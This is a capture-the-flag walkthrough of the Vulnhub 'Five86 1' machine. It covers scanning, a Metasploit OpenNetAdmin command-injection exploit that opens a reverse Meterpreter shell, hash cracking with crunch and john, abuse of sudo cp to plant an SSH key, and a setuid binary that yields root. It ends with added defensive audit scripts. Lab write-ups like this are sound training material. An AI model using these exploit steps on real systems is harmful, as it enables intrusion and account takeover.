
Vulnhub Five86 1 Target Machine: Detailed Testing Walkthrough

Time: 2023-02-22 21:45:04

Five86 1

Author: jason_huawen

Target Information

Name: five86: 1

URL:

https://www.vulnhub.com/entry/five86-1,417/

Identifying the Target Host's IP Address

┌──(kali㉿kali)-[~/Vulnhub/Five86_1]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                         
                                                                                                                             
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                             
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:06      1      60  Unknown vendor                                                            
 192.168.56.100  08:00:27:85:57:73      1      60  PCS Systemtechnik GmbH                                                    
 192.168.56.158  08:00:27:ac:ab:f2      1      60  PCS Systemtechnik GmbH   

Using the netdiscover tool bundled with Kali Linux, the target host's IP address is identified as 192.168.56.158.

NMAP Scan

┌──(kali㉿kali)-[~/Vulnhub/Five86_1]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.158 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-22 07:54 EST
Nmap scan report for localhost (192.168.56.158)
Host is up (0.000086s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 69e63cbf72f7a000f9d9f41d68e23cbd (RSA)
|   256 459ec71e9f5bd3cefc1756f2f642abdc (ECDSA)
|_  256 ae0a9e92645f8620c41144e05832e505 (ED25519)
80/tcp    open  http    Apache httpd 2.4.38 ((Debian))
| http-robots.txt: 1 disallowed entry 
|_/ona
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
10000/tcp open  http    MiniServ 1.920 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
MAC Address: 08:00:27:AC:AB:F2 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.32 seconds
                                                                                           

The NMAP scan shows that the target host has 3 open ports: 22 (SSH), 80 (HTTP) and 10000 (HTTP).

Getting a Shell

┌──(kali㉿kali)-[~/Vulnhub/Five86_1]
└─$ curl http://192.168.56.158/robots.txt          
User-agent: *
Disallow: /ona

┌──(kali㉿kali)-[~/Vulnhub/Five86_1]
└─$ nikto -h http://192.168.56.158      
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.158
+ Target Hostname:    192.168.56.158
+ Target Port:        80
+ Start Time:         2023-02-22 07:58:25 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Cookie ona_context_name created without the httponly flag
+ Cookie ONA_SESSION_ID created without the httponly flag
+ Entry '/ona/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8068 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2023-02-22 07:59:18 (GMT-5) (53 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to [email protected]) (y/n)? 

                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Five86_1]
└─$ nikto -h http://192.168.56.158/ona
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.158
+ Target Hostname:    192.168.56.158
+ Target Port:        80
+ Start Time:         2023-02-22 07:59:23 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie ona_context_name created without the httponly flag
+ Cookie ONA_SESSION_ID created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD 
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /ona/index.php?option=search&searchword=<script>alert(document.cookie);</script>: Mambo Site Server 4.0 build 10 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2820: /ona/index.php?dir=<script>alert('Vulnerable')</script>: Auto Directory Index 1.2.3 and prior are vulnerable to XSS attacks.
+ OSVDB-50552: /ona/index.php?file=Liens&op=\"><script>alert('Vulnerable');</script>: Nuked-klan 1.3b is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /ona/index.php?action=storenew&username=<script>alert('Vulnerable')</script>: SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page. CA-200-02.
+ /ona/index.php/\"><script><script>alert(document.cookie)</script><: eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-50553: /ona/index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</script>: eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-50553: /ona/index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search: eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-38019: /ona/?mod=<script>alert(document.cookie)</script>&op=browse: Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3268: /ona/config/: Directory indexing found.
+ /ona/config/: Configuration information may be available remotely.
+ OSVDB-25497: /ona/index.php?rep=<script>alert(document.cookie)</script>: GPhotos index.php rep Variable XSS.
+ OSVDB-12606: /ona/index.php?err=3&email=\"><script>alert(document.cookie)</script>: MySQL Eventum is vulnerable to XSS in the email field.
+ OSVDB-2790: /ona/index.php?vo=\"><script>alert(document.cookie);</script>: Ralusp Sympoll 1.5 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3268: /ona/images/: Directory indexing found.
+ /ona/login.php: Admin login page/section found.
+ 7916 requests: 0 error(s) and 24 item(s) reported on remote host
+ End Time:           2023-02-22 08:00:20 (GMT-5) (57 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to [email protected]) (y/n)? 

Browsing to port 80, the returned page shows that the CMS is OpenNetAdmin, version 18.1.1.

                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Five86_1]
└─$ searchsploit OpenNetAdmin       
-------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                              |  Path
-------------------------------------------------------------------------------------------- ---------------------------------
OpenNetAdmin 13.03.01 - Remote Code Execution                                               | php/webapps/26682.txt
OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit)                                | php/webapps/47772.rb
OpenNetAdmin 18.1.1 - Remote Code Execution                                                 | php/webapps/47691.sh
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

msf6 > use exploit/unix/webapp/opennetadmin_ping_cmd_injection
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > show options 

Module options (exploit/unix/webapp/opennetadmin_ping_cmd_injection):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-M
                                         etasploit
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /ona/login.php   yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target



View the full module info with the info, or info -d command.

msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > set LHOST 192.168.56.206
LHOST => 192.168.56.206
msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > set LPORT 5555
LPORT => 5555
msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > set RHOSTS 192.168.56.158
RHOSTS => 192.168.56.158
msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > run

[*] Started reverse TCP handler on 192.168.56.206:5555 
[*] Exploiting...
[*] Sending stage (1017704 bytes) to 192.168.56.158
[*] Meterpreter session 1 opened (192.168.56.206:5555 -> 192.168.56.158:43918) at 2023-02-22 08:05:13 -0500
id
[*] Command Stager progress - 100.00% done (706/706 bytes)

meterpreter > id
[-] Unknown command: id
meterpreter > shell
Process 1701 created.
Channel 1 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@five86-1:/opt/ona/www$ 

www-data@five86-1:~$ cat .htpasswd
cat .htpasswd
douglas:$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1

# To make things slightly less painful (a standard dictionary will likely fail),
# use the following character set for this 10 character password: aefhrt 
www-data@five86-1:~$ 

Privilege Escalation

The .htpasswd file hints that the password is 10 characters long and made up of the characters aefhrt.

┌──(kali㉿kali)-[~/Vulnhub/Five86_1]
└─$ crunch 10 10 aefhrt -o dict                                                 
Crunch will now generate the following amount of data: 665127936 bytes
634 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 60466176 

crunch: 100% completed generating output
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Five86_1]
└─$ john --wordlist=dict hashes                            
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
fatherrrrr       (douglas)     
1g 0:00:01:33 DONE (2023-02-22 08:17) 0.01072g/s 232804p/s 232804c/s 232804C/s fatherraaa..fatherrtet
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

www-data@five86-1:~$ su - douglas
su - douglas
Password: fatherrrrr

douglas@five86-1:~$ id
id
uid=1005(douglas) gid=1005(douglas) groups=1005(douglas)
douglas@five86-1:~$ sudo -l
sudo -l
Matching Defaults entries for douglas on five86-1:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User douglas may run the following commands on five86-1:
    (jen) NOPASSWD: /bin/cp

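douglas's ~/.ssh directory contains two files, id_rsa and id_rsa.pub. Since douglas can run /bin/cp as jen, copying the public key into jen's .ssh directory as authorized_keys allows passwordless SSH public-key login as jen.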

douglas@five86-1:~/.ssh$ ls -alh
ls -alh
total 16K
drwx------ 2 douglas douglas 4.0K Jan  1  2020 .
drwx------ 3 douglas douglas 4.0K Jan  1  2020 ..
-rw------- 1 douglas douglas 1.8K Jan  1  2020 id_rsa
-rw-r--r-- 1 douglas douglas  398 Jan  1  2020 id_rsa.pub
douglas@five86-1:~/.ssh$ cp id_rsa.pub /tmp/authorized_keys
cp id_rsa.pub /tmp/authorized_keys
douglas@five86-1:~/.ssh$ chmod 777 /tmp/authorized_keys
chmod 777 /tmp/authorized_keys
douglas@five86-1:~/.ssh$ sudo -u jen /bin/cp /tmp/authorized_keys /home/jen/.ssh/
<-u jen /bin/cp /tmp/authorized_keys /home/jen/.ssh/
douglas@five86-1:~/.ssh$ ssh [email protected] 
ssh [email protected] 
The authenticity of host '192.168.56.158 (192.168.56.158)' can't be established.
ECDSA key fingerprint is SHA256:aE9ZqWXrvGgzgM21BjQ23GmxQVBeD5CZw0nUq8P8RyM.
Are you sure you want to continue connecting (yes/no)? yes
yes
Warning: Permanently added '192.168.56.158' (ECDSA) to the list of known hosts.
Linux five86-1 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
jen@five86-1:~$ id
id
uid=1003(jen) gid=1003(jen) groups=1003(jen)
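
The `(jen) NOPASSWD: /bin/cp` rule shown above gives douglas write access to every file jen can write, which is why placing a key in /home/jen/.ssh/ works. As an added example (not part of the original post), the function below scans `sudo -l` output for such unrestricted file-write grants; the binary list, the output format and the two sample rules marked as constructed are assumptions for illustration.

```bash
#!/usr/bin/env bash
# Added example: flag sudo rules that hand out an unrestricted file-write
# primitive as another user, such as "(jen) NOPASSWD: /bin/cp".

# Assumed, non-exhaustive list of binaries that can write a caller-chosen
# file to a caller-chosen path when their arguments are not restricted.
FILE_WRITE_BINS="cp mv tee dd install rsync"

# audit_sudo_l: reads `sudo -l` output on stdin and prints one line per
# finding in the form SEVERITY|runas|nopasswd|command (format is an assumption).
audit_sudo_l() {
  awk -v bins="$FILE_WRITE_BINS" '
    BEGIN { n = split(bins, b, " "); for (i = 1; i <= n; i++) risky[b[i]] = 1 }
    # Rule lines are indented and start with the run-as spec: "    (jen) ..."
    /^[ \t]+\(/ {
      line = $0
      sub(/^[ \t]+/, "", line)
      runas = line; sub(/\).*$/, "", runas); sub(/^\(/, "", runas)
      rest = line; sub(/^\([^)]*\)[ \t]*/, "", rest)
      nopass = "no"
      ncmd = split(rest, cmds, /,[ \t]*/)
      for (c = 1; c <= ncmd; c++) {
        cmd = cmds[c]
        # Strip leading tags (NOPASSWD:, SETENV:, ...); tags carry over to
        # the following commands of the same rule, as in sudoers.
        while (match(cmd, /^[A-Z_]+:[ \t]*/)) {
          tag = substr(cmd, 1, RLENGTH)
          if (tag ~ /^NOPASSWD:/) nopass = "yes"
          if (tag ~ /^PASSWD:/) nopass = "no"
          cmd = substr(cmd, RLENGTH + 1)
        }
        sub(/[ \t]+$/, "", cmd)
        nf = split(cmd, w, /[ \t]+/)
        base = w[1]; sub(/^.*\//, "", base)
        if (w[1] == "ALL") sev = "HIGH"                    # any command at all
        else if ((base in risky) && nf == 1) sev = "HIGH"  # any source, any destination
        else if (base in risky) sev = "REVIEW"             # arguments pinned: check them
        else continue
        print sev "|" runas "|" nopass "|" cmd
      }
    }'
}

# Sample input: the douglas output from this walkthrough, followed by two
# constructed rules (systemctl, rsync) added here for contrast.
sample_sudo_l() {
  cat <<'EOF'
Matching Defaults entries for douglas on five86-1:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User douglas may run the following commands on five86-1:
    (jen) NOPASSWD: /bin/cp
    (root) /usr/bin/systemctl status apache2
    (backup) NOPASSWD: /usr/bin/rsync -a /var/www/ /srv/backup/
EOF
}

sample_sudo_l | audit_sudo_l
```

A HIGH finding means the grant should be replaced with a rule that pins both source and destination, or removed; REVIEW means the pinned arguments still need a manual look.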

The login banner notes that jen has new mail.

From: Roy Trenneman <roy@five86-1>
Date: Wed, 01 Jan 2020 03:17:00 -0500

Hi Jen,

As you know, I'll be on the "customer service" course on Monday due to that inci
dent on Level 4 with the accounts people.

But anyway, I had to change Moss's password earlier today, so when Moss is back 
on Monday morning, can you let him know that his password is now Fire!Fire!

Moss will understand (ha ha ha ha).

This email gives us a hint: the password for the moss user is Fire!Fire!

So we SSH in as the moss user.

┌──(kali㉿kali)-[~/Vulnhub/Five86_1]
└─$ ssh [email protected]         
The authenticity of host '192.168.56.158 (192.168.56.158)' can't be established.
ED25519 key fingerprint is SHA256:c8HTcx7tPvrbA31UeXE5fRobpanfPTTHV85muCC7LpI.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.158' (ED25519) to the list of known hosts.
[email protected]'s password: 
Linux five86-1 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
moss@five86-1:~$ id
uid=1001(moss) gid=1001(moss) groups=1001(moss)
moss@five86-1:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for moss: 
Sorry, user moss may not run sudo on five86-1.
moss@five86-1:~$ ls -alh
total 12K
drwx------ 3 moss moss 4.0K Jan  1  2020 .
drwxr-xr-x 7 root root 4.0K Jan  1  2020 ..
lrwxrwxrwx 1 moss moss    9 Jan  1  2020 .bash_history -> /dev/null
drwx------ 2 moss moss 4.0K Jan  1  2020 .games
moss@five86-1:~$ cd .games
moss@five86-1:~/.games$ ls -alh
total 28K
drwx------ 2 moss moss 4.0K Jan  1  2020 .
drwx------ 3 moss moss 4.0K Jan  1  2020 ..
lrwxrwxrwx 1 moss moss   21 Jan  1  2020 battlestar -> /usr/games/battlestar
lrwxrwxrwx 1 moss moss   14 Jan  1  2020 bcd -> /usr/games/bcd
lrwxrwxrwx 1 moss moss   21 Jan  1  2020 bombardier -> /usr/games/bombardier
lrwxrwxrwx 1 moss moss   17 Jan  1  2020 empire -> /usr/games/empire
lrwxrwxrwx 1 moss moss   20 Jan  1  2020 freesweep -> /usr/games/freesweep
lrwxrwxrwx 1 moss moss   15 Jan  1  2020 hunt -> /usr/games/hunt
lrwxrwxrwx 1 moss moss   20 Jan  1  2020 ninvaders -> /usr/games/ninvaders
lrwxrwxrwx 1 moss moss   17 Jan  1  2020 nsnake -> /usr/games/nsnake
lrwxrwxrwx 1 moss moss   25 Jan  1  2020 pacman4console -> /usr/games/pacman4console
lrwxrwxrwx 1 moss moss   17 Jan  1  2020 petris -> /usr/games/petris
lrwxrwxrwx 1 moss moss   16 Jan  1  2020 snake -> /usr/games/snake
lrwxrwxrwx 1 moss moss   17 Jan  1  2020 sudoku -> /usr/games/sudoku
-rwsr-xr-x 1 root root  17K Jan  1  2020 upyourgame
lrwxrwxrwx 1 moss moss   16 Jan  1  2020 worms -> /usr/games/worms
moss@five86-1:~/.games$ cat upyourgame
[raw ELF binary output omitted]
moss@five86-1:~/.games$ ls -alh
total 28K
drwx------ 2 moss moss 4.0K Jan  1  2020 .
drwx------ 3 moss moss 4.0K Jan  1  2020 ..
lrwxrwxrwx 1 moss moss   21 Jan  1  2020 battlestar -> /usr/games/battlestar
lrwxrwxrwx 1 moss moss   14 Jan  1  2020 bcd -> /usr/games/bcd
lrwxrwxrwx 1 moss moss   21 Jan  1  2020 bombardier -> /usr/games/bombardier
lrwxrwxrwx 1 moss moss   17 Jan  1  2020 empire -> /usr/games/empire
lrwxrwxrwx 1 moss moss   20 Jan  1  2020 freesweep -> /usr/games/freesweep
lrwxrwxrwx 1 moss moss   15 Jan  1  2020 hunt -> /usr/games/hunt
lrwxrwxrwx 1 moss moss   20 Jan  1  2020 ninvaders -> /usr/games/ninvaders
lrwxrwxrwx 1 moss moss   17 Jan  1  2020 nsnake -> /usr/games/nsnake
lrwxrwxrwx 1 moss moss   25 Jan  1  2020 pacman4console -> /usr/games/pacman4console
lrwxrwxrwx 1 moss moss   17 Jan  1  2020 petris -> /usr/games/petris
lrwxrwxrwx 1 moss moss   16 Jan  1  2020 snake -> /usr/games/snake
lrwxrwxrwx 1 moss moss   17 Jan  1  2020 sudoku -> /usr/games/sudoku
-rwsr-xr-x 1 root root  17K Jan  1  2020 upyourgame
lrwxrwxrwx 1 moss moss   16 Jan  1  2020 worms -> /usr/games/worms
moss@five86-1:~/.games$ ./upyourgame
Would you like to play a game? y

Could you please repeat that? y

Nope, you'll need to enter that again. y

You entered: No.  Is this correct? Y

We appear to have a problem?  Do we have a problem? n

Made in Britain.
# cd /root
# ls -alh
total 24K
drwx------  3 root root 4.0K Jan  1  2020 .
drwxr-xr-x 18 root root 4.0K Dec 31  2019 ..
lrwxrwxrwx  1 root root    9 Dec 31  2019 .bash_history -> /dev/null
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
-rwx------  1 root root   33 Jan  1  2020 flag.txt
drwxr-xr-x  3 root root 4.0K Jan  1  2020 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
# cat flag.txt
8f3b38dd95eccf600593da4522251746
# 
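
The root shell above comes from upyourgame, a root-owned setuid file (`-rwsr-xr-x 1 root root`) sitting inside a user's home directory. As an added example (not part of the original post), the function below lists setuid files that live outside the directories where a distribution normally installs them; the directory allowlist and the optional owner argument are assumptions for illustration.

```bash
#!/usr/bin/env bash
# Added example: list setuid files that live outside the usual system
# directories, like the root-owned -rwsr-xr-x upyourgame in ~/.games.

# Assumed allowlist of directories where packaged setuid binaries normally live.
SUID_SYSTEM_DIRS="/bin /sbin /usr/bin /usr/sbin /usr/lib /usr/libexec"

# find_stray_suid ROOT [OWNER_UID]
#   ROOT       directory tree to scan (for example /home, /opt, /tmp, or /)
#   OWNER_UID  report only files owned by this uid (default 0, i.e. root)
# Prints each setuid regular file under ROOT that is not inside one of
# SUID_SYSTEM_DIRS. -xdev keeps find on one filesystem (skips /proc, /sys).
find_stray_suid() {
  local root owner path dir stray
  root="$1"
  owner="${2:-0}"
  find "$root" -xdev -type f -perm -4000 -user "$owner" 2>/dev/null |
  while IFS= read -r path; do
    stray=1
    for dir in $SUID_SYSTEM_DIRS; do
      case "$path" in
        "$dir"/*) stray=0; break ;;   # inside an allowlisted directory
      esac
    done
    if [ "$stray" -eq 1 ]; then
      printf '%s\n' "$path"
    fi
  done
}

# Usage on a live host (as root, so unreadable directories are not skipped):
#   find_stray_suid /home
#   find_stray_suid /
```

Mounting user-writable filesystems such as /home and /tmp with the `nosuid` option makes the kernel ignore the setuid bit on files like this one.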

From: https://www.cnblogs.com/jason-huawen/p/17146071.html
